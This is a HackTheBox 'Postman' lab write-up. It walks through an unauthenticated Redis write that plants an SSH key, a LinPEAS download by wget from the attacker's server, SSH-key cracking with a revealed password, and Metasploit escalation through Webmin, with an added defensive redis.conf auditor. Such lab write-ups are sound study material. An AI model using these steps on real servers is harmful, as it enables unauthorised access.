HackTheBox Postman Write Up
13 Mar 2020
Let’s run a quick nmap scan as always.
# nmap -sV -sC -O -oA nmap/initial 10.10.10.160
-sV  Version detection
-sC  Script scan
-O   Enable OS detection
-oA  Output to all formats
While I wait for this to be finished I’ll start a full nmap scan.
# nmap -sV -sC -O -p- -oA nmap/initial 10.10.10.160
As usual we have port 22 and port 80 open, but here there is also an HTTP service on port 10000. Let's enumerate those pages.
The service on port 10000 only answers over HTTPS, so I have to add an "s" to the URL to access it.
I’ll also start up gobuster. On port 10000 every page link loads the same login so gobuster doesn’t help us there. Let’s run it on port 80.
gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u 10.10.10.160 -x php,html -t 100
Now I felt kind of lost, so I looked at what the full nmap scan had found.
Getting user account
Redis file write
So we have something called Redis running here. I tried to find an explanation of what it is and how it can be exploited, and Google found this:
The Redis security model is: “it’s totally insecure to let untrusted clients access the system, please protect it from the outside world yourself”.
So we're on the right track: the developers themselves tell us that an exposed Redis instance is the problem. Using telnet we can confirm that we can connect to the service without any authentication:
$ telnet 10.10.10.160 6379
We don't get a real shell here, but we can write files. We'll write our own ssh key onto the box, so let's generate a key pair first.
We will push the public key into Redis and pad it with newlines before and after. Why? We'll store it in Redis memory and then have Redis save its dataset to a file. That file will contain a lot of binary garbage around our key, and we're hoping sshd will parse the file, ignore the garbage and still read our key correctly.
$ (echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") > foo.txt
Now foo.txt is just our public key surrounded by newlines. We can store this string in Redis memory using:
$ redis-cli -h 10.10.10.160 flushall
$ cat foo.txt | redis-cli -h 10.10.10.160 -x set crackit
Looks good. How do we dump the memory content into the authorized_keys file? You can see what I did in the picture below.
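The root cause on the Redis side is configuration, not a bug, so here is a small auditor (added example, not part of the original write-up) that flags the redis.conf settings which make the trick above possible and shows a hardened equivalent. Both config texts are constructed samples, not the real files from the box, and the password value is a placeholder.

```python
# Added example: audit a redis.conf for the settings that let an
# unauthenticated client turn SAVE into an arbitrary file write.
# Both configs below are constructed samples, not files from the machine.
WEAK_CONF = """\
bind 0.0.0.0
protected-mode no
port 6379
# requirepass left commented out: anyone who can reach the port is a client
# requirepass change-me
dir /var/lib/redis
dbfilename dump.rdb
"""

HARDENED_CONF = """\
bind 127.0.0.1
protected-mode yes
port 6379
requirepass REPLACE-WITH-A-LONG-RANDOM-SECRET
# CONFIG SET dir/dbfilename is what points SAVE at a file like authorized_keys
rename-command CONFIG ""
rename-command FLUSHALL ""
"""

def parse_conf(text):
    """Map each active directive to the list of its values (comments skipped)."""
    conf = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split(None, 1)
        value = parts[1].strip() if len(parts) > 1 else ""
        conf.setdefault(parts[0].lower(), []).append(value)
    return conf

def audit_redis_conf(text):
    """Return the weaknesses that let an unauthenticated client abuse SAVE."""
    conf = parse_conf(text)
    findings = []
    addrs = " ".join(conf.get("bind", ["0.0.0.0"])).split()  # unset: all interfaces
    if any(a in ("0.0.0.0", "::", "*") for a in addrs):
        findings.append("bind: listening on all interfaces")
    if conf.get("protected-mode", ["yes"])[-1].lower() != "yes":
        findings.append("protected-mode: disabled")
    if not any(conf.get("requirepass", [])):
        findings.append("requirepass: no password, unauthenticated access allowed")
    renamed = {v.split()[0].upper() for v in conf.get("rename-command", []) if v}
    if "CONFIG" not in renamed:
        findings.append("rename-command: CONFIG still reachable, dir/dbfilename can be changed")
    return findings

if __name__ == "__main__":
    for name, text in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF)):
        print(name, audit_redis_conf(text) or ["no findings"])
```

Newer Redis versions also offer ACLs as a finer-grained alternative to rename-command, but the four checks above are the ones that matter for this particular write-up.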
Now that we've got a shell, running
$ cat /etc/passwd
shows that we need to gain access to Matt's account.
We can't run anything with sudo and we don't belong to any special groups. I searched the redis directory but there was nothing we could work with. I went into /var and checked every folder, and again, nothing to work with. Let's pull out the big guns, the big guns being LinPEAS. Let's transfer it onto the server.
Clone the repo to your machine, enter the /linPEAS directory and start an HTTP server from there. I used port 1114.
$ sudo python -m SimpleHTTPServer 1114
Now, on the target, navigate to /tmp, create a directory there and cd into it (e.g. /tmp/1234), then grab the file from your machine.
$ wget <your ip here>:1114/linpeas.sh
Now I ran the script and spent some time looking at the output. This took a while, but there is a
Cracking ssh key with John
Simply feed this key to ssh2john.py and crack the resulting hash with John using the rockyou.txt wordlist.
I tried to ssh into the server with this key but no success. So I connected again as redis and ran
$ su Matt
And that's how I got user:
Matt@Postman:~$ cat user.txt
517ad...
Getting root is pretty easy. I just logged into Webmin as Matt with the cracked password, computer2008. Inside there wasn't much I could do, but there is a notification saying the software needs to be updated.
Webmin privilege escalation
I found an exploit for it in Metasploit and used it. The options I changed are highlighted below. Make sure to switch the payload, as the default one didn't work for me; I always have success with the python one.
> show payloads
> set payload <payload here>
After this you can simply type exploit, and you should have a shell as root and you can